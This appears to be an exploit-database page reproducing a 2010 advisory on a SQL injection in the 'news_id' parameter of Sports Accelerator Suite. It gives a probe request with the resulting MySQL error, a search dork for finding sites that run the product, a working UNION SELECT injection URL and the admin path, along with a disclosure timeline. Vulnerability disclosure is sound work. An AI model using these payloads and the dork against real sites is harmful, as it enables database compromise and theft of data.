header-logo
Suggest Exploit
vendor:
Sports Accelerator Suite
by:
Gjoko 'LiquidWorm' Krstic
7,5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Sports Accelerator Suite
Affected Version From: 1.1
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:athletewebservices:sports_accelerator_suite
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft IIS 6.0, MySQL 4.0.15-log, PHP 4.3.3
2010

Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability

The CMS is vulnerable to an SQL Injection attack when input is passed to the 'news_id' parameter. The script fails to properly sanitize the input before being returned to the user allowing the attacker to compromise the entire DB system and view sensitive information.

Mitigation:

Input validation and proper sanitization of user input should be implemented to prevent SQL Injection attacks.
Source

Exploit-DB raw data:

 Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability



 Vendor: Athlete Web Services, Inc. / AWS Sports
 Product Web Page: http://www.athletewebservices.com


 Summary: Content Management System (PHP+MySQL).


 Description: The CMS is vulnerable to an SQL Injection attack when input is
 passed to the "news_id" parameter. The script fails to properly sanitize the
 input before being returned to the user allowing the attacker to compromise
 the entire DB system and view sensitive information.


 =============================================================================

 GET .../show_news.php?news_id=xx%27

 1064 - You have an error in your SQL syntax. Check the manual that corresponds
 to your MySQL server version for the right syntax to use near '\'' at line xx.

 =============================================================================


 Affected Version: 1.1 and 2.0


 Tested On: Microsoft IIS 6.0
            MySQL 4.0.15-log
            PHP 4.3.3


 Vulnerability Discovered By: Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com
 http://www.zeroscience.mk


 Vendor Status: [05.06.2010] Vulnerability discovered.
                [09.08.2010] Vendor contacted.
                [13.08.2010] No response from vendor.
                [14.08.2010] Public advisory released.


 Zero Science Lab Advisory ID: ZSL-2010-4949
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4949.php


 Vector:

 -----------------------------------------------------------------------------

 Dork: "Designed and powered by AWS Sports"

 Query: http://vulnpage.tld/show_news.php?news_id=xx+and+1=0+%20union%20select%20database%28%29,2,3,4,5,6,7..[n]

 Admin: http://vulpage.tld/admin/index.php

 -----------------------------------------------------------------------------



 t00t!

Navigation

Suggest Exploit

Services By CQR